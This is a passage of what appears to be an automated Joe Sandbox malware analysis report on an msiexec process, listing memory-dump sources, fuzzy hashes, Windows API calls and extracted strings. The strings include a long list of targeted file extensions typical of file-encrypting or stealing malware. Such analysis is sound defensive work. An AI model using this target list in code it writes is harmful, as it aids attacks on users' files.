                                                                                                                                                                                                                                • Instruction ID: 8b2e9fd3508755b4290415ac1056bd8255320a5f7c938bedb9ea5707d6b469f4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc231e65d0748e1db527e6d3163488e6c807fb8e82cbe1eb3e380d86784a3395
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22112737B747A287E355CE37ECD8696639AEBC9311B5A0034EE42D7202C6A2E825D190
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42b3995fb05ba2d6ab916736a865c7a487c1d8658494739d7c0b4ed64cb6f6be
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D601FCF1702B0147EB229E15D4E873BB2A89F91714F59043CD4884B3C2EB71ED15CEA5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8f1fb870e534d30f14ba38abfb16f27e1e932e2f23a2b7dd770fc73d4444481d
                                                                                                                                                                                                                                • Instruction ID: 31547161238405d58cfea4b2a0f49f93d4ec3eb56748e7b5b53b2e318f13169a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f1fb870e534d30f14ba38abfb16f27e1e932e2f23a2b7dd770fc73d4444481d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D901F1326207408FD729CF39C8A5FA7B7EAEB86310F18892CD096C7256CB38B401CB11
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: de8fe2b55ef9b5db72a078622e5c7edbe66cc86be4e000839977194775acc9d1
                                                                                                                                                                                                                                • Instruction ID: 02263810d66b77d68ad9ce1fb7863c3fe45a9fc03106bb57e500cc5bcb19ae89
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de8fe2b55ef9b5db72a078622e5c7edbe66cc86be4e000839977194775acc9d1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CE04F75A192808FEB1E9F2CE8A15A6B7F9EB9B704F24582DC083D3721C135D413CA0A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3c0b97da7f5b7163e2f1f0a3116f3f0bd4672ad5c78592706b0b02764a7c6e13
                                                                                                                                                                                                                                • Instruction ID: c4e87e36993eb10efb0cb096fc14c2bcae769aca1e46009e67bfc8e73b4242c9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c0b97da7f5b7163e2f1f0a3116f3f0bd4672ad5c78592706b0b02764a7c6e13
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DE0123454C6808ED34A9B24D19266FFBA1DBD7710F109C1CC5C517761CA39981ACB46
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1dad9c36f4548be12f11b2ded66d1107bba49bc57a3d51690593ddec657595d9
                                                                                                                                                                                                                                • Instruction ID: 1bb5534fe050707993d75552d615835b91082125c9dfd1676a16b04854b1cf59
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1dad9c36f4548be12f11b2ded66d1107bba49bc57a3d51690593ddec657595d9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14B092A5C924618AA0232A123C124BBB0288913218F443830E84A23282BA16D22A499F
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06182D20: Concurrency::cancel_current_task.LIBCPMT ref: 06182E2E
                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 06181960
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                • String ID: .aac$.accdb$.accde$.accdr$.accdt$.adt$.adts$.aif$.aifc$.aiff$.aspx$.avi$.bin$.bmp$.cab$.cda$.csv$.dif$.doc$.docm$.docx$.dot$.dotx$.eml$.eps$.flv$.gif$.htm$.html$.ini$.iso$.jar$.jpeg$.jpg$.m4a$.mdb$.mid$.midi$.mov$.mp3$.mp4$.mpeg$.mpg$.mui$.pdf$.png$.pot$.potm$.potx$.ppam$.pps$.ppsm$.ppsx$.ppt$.pptm$.pptx$.psd$.pst$.pub$.rar$.rtf$.sldm$.sldx$.swf$.tif$.tiff$.tmp$.vob$.vsd$.vsdm$.vsdx$.vss$.vssm$.vst$.vstm$.vstx$.wav$.wbk$.wks$.wma$.wmd$.wms$.wmv$.wmz$.wp5$.wpd$.xla$.xlam$.xll$.xlm$.xls$.xlsm$.xlsx$.xlt$.xltm$.xltx$.xps$.zip$b
                                                                                                                                                                                                                                • API String ID: 118556049-612049309
                                                                                                                                                                                                                                • Opcode ID: 33dabd4dc443a6fb80796d99adcad3f50aaed8fba6b927043dd0f2687f55e3fd
                                                                                                                                                                                                                                • Instruction ID: fd7ba856be589bda026d95bc085bedda0769385ab6403783a689de28681a0505
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33dabd4dc443a6fb80796d99adcad3f50aaed8fba6b927043dd0f2687f55e3fd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E327A3890538CEDDBC6F7A4CD05BECBBB0DF6A215F5481C89454332819BB46B48DEA6
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                                • String ID: 0$A$C$E$G$H$I$K$L$M$O$O$P$Q$S$T$U$W$W$[$a$d$f$g$g$q$r$s$u$z$}$}$~
                                                                                                                                                                                                                                • API String ID: 2525500382-2768426949
                                                                                                                                                                                                                                • Opcode ID: ec8247299c4f856de9c4b38f65555b969123fc019ecbf7a009daf4a31c6c5a8c
                                                                                                                                                                                                                                • Instruction ID: 3b4575cedc2db78fd26c567a777b40ee06e545d3b15d8c5381fe44658dd4fc91
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec8247299c4f856de9c4b38f65555b969123fc019ecbf7a009daf4a31c6c5a8c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1291F56150DBC28AE332C73C881879FBED15BA6224F088B9DD5E95B3E2C3B94405C763
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                • String ID: )$+$-$/$1$3$5$7$9$;$=$>$?
                                                                                                                                                                                                                                • API String ID: 2610073882-1533546387
                                                                                                                                                                                                                                • Opcode ID: b1032ddcb45f131c705afd6b871bfe77584d9b13ec4ca195305fd2456dd28a15
                                                                                                                                                                                                                                • Instruction ID: 97a9f372832291b077af38dff8557f04f46196fc8aaddbfabf3f4cec7be32271
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1032ddcb45f131c705afd6b871bfe77584d9b13ec4ca195305fd2456dd28a15
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD415E30508B818EE726CF3CC898716BFD16B56314F08C6ADC4A64F3DBC6B59506C762
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                • String ID: )$+$-$/$1$3$5$7$9$;$=$>$?
                                                                                                                                                                                                                                • API String ID: 2610073882-1533546387
                                                                                                                                                                                                                                • Opcode ID: e182231ae3f7a8b71239c66e24d8771e4aec9ca6e2eb4eb59d6e98b195fc4bf5
                                                                                                                                                                                                                                • Instruction ID: e74edfc1fa18f50f51ed703161e9488963bc2a110ba42e0cee399861a1f53488
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e182231ae3f7a8b71239c66e24d8771e4aec9ca6e2eb4eb59d6e98b195fc4bf5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1417D30508BC18ED7268F3CC898756BFD16B66314F08C6ADD49A4F3DBC6B98506C762
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                • String ID: i$k$m$n$o$q$s$u$w$y${$}
                                                                                                                                                                                                                                • API String ID: 2610073882-434376181
                                                                                                                                                                                                                                • Opcode ID: e1af7b5205c9c346803fcf53fd5e495b806f59d75e5b9e8b11e070e57e614740
                                                                                                                                                                                                                                • Instruction ID: 755d46f86f48d0290d8ad967b7528ab669bc66dac44677a93aade8ad3208dccc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1af7b5205c9c346803fcf53fd5e495b806f59d75e5b9e8b11e070e57e614740
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA21A82440C7C1CDD32297BC944875EFFD15BA6364F084A9CE0E54A3E6D6AA9049C723
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitVariant
                                                                                                                                                                                                                                • String ID: i$k$m$n$o$q$s$u$w$y${$}
                                                                                                                                                                                                                                • API String ID: 1927566239-434376181
                                                                                                                                                                                                                                • Opcode ID: 440f305416e5be656b278947d4ad11911db8da8ae28adaa5eeccfda1296f9473
                                                                                                                                                                                                                                • Instruction ID: 946926bd6ed6a89f5553a4dd7654d5be90878fef8c21f538ade4ffcb0c28abea
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 440f305416e5be656b278947d4ad11911db8da8ae28adaa5eeccfda1296f9473
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F521096040C7C1CED322967C840875EFFE15BA3328F084A9DE0E48A3E6D6AA9449C763
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitVariant
                                                                                                                                                                                                                                • String ID: E$G$O$Q$^$`$d$g$h$m$x
                                                                                                                                                                                                                                • API String ID: 1927566239-3219273279
                                                                                                                                                                                                                                • Opcode ID: 15c7a9d908a2bac8efa8f4be7da28b0b825cff8a4979cf83b4f8d3cea1abf2a8
                                                                                                                                                                                                                                • Instruction ID: fdde5f090036fb990196b0e8790b97b745b18ba3aac3ad6da010cb24b4c94486
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15c7a9d908a2bac8efa8f4be7da28b0b825cff8a4979cf83b4f8d3cea1abf2a8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D41067010C3C18AD3619B38849875FBFD1AB96328F584A5CF0E95B3E2C6798545C763
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitVariant
                                                                                                                                                                                                                                • String ID: E$G$O$Q$^$`$d$g$h$m$x
                                                                                                                                                                                                                                • API String ID: 1927566239-3219273279
                                                                                                                                                                                                                                • Opcode ID: 32d6bd24a4b2fcf0e3dc66f226139f3033af6210c809eef5104f674486a8f680
                                                                                                                                                                                                                                • Instruction ID: 455cacee50b3d28202f8c33d394cb894d747cf9dabeda7735581c99bd4e081fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32d6bd24a4b2fcf0e3dc66f226139f3033af6210c809eef5104f674486a8f680
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0641266000C7C19ED3628B3C849875EBFD09B96228F584B9CF0E99B2E2C6658549C767
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 06187D7D
                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 06187DA9
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 06187DE8
                                                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 06187E05
                                                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 06187E44
                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 06187E61
                                                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 06187EA3
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 06187EC6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2040435927-0
                                                                                                                                                                                                                                • Opcode ID: f8b87e44b5a73667a8597e1678cdf7bdd6826415b9b922d1515685604999feb5
                                                                                                                                                                                                                                • Instruction ID: 9741e6fde75df2843f78ab1d8f8d867e285ac4d6091f3ff676a8b8ba29d9ea9f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8b87e44b5a73667a8597e1678cdf7bdd6826415b9b922d1515685604999feb5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26518C7290020AAFEBA0AF65CC44FEF7BA9EB40750F254925FE15E6190E7709C50CFA0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 0618B9F7
                                                                                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 0618BB05
                                                                                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 0618BC72
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                • API String ID: 1206542248-393685449
                                                                                                                                                                                                                                • Opcode ID: 839334a9b64542af61e0439070bf5915f148cec5de30f77a046fd35d7bd1629c
                                                                                                                                                                                                                                • Instruction ID: edce896a424e28785894ebb01b82589f7d6e95b00719dec10e8f6dc517f1a571
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 839334a9b64542af61e0439070bf5915f148cec5de30f77a046fd35d7bd1629c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7B16C71C08209EFCFA9EFA8C8809AEBBB5FF44310F14455AE8256B216D731DA51CF91
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 06182263
                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 061822AF
                                                                                                                                                                                                                                • __Getctype.LIBCPMT ref: 061822C8
                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 061822E4
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 06182379
                                                                                                                                                                                                                                Strings
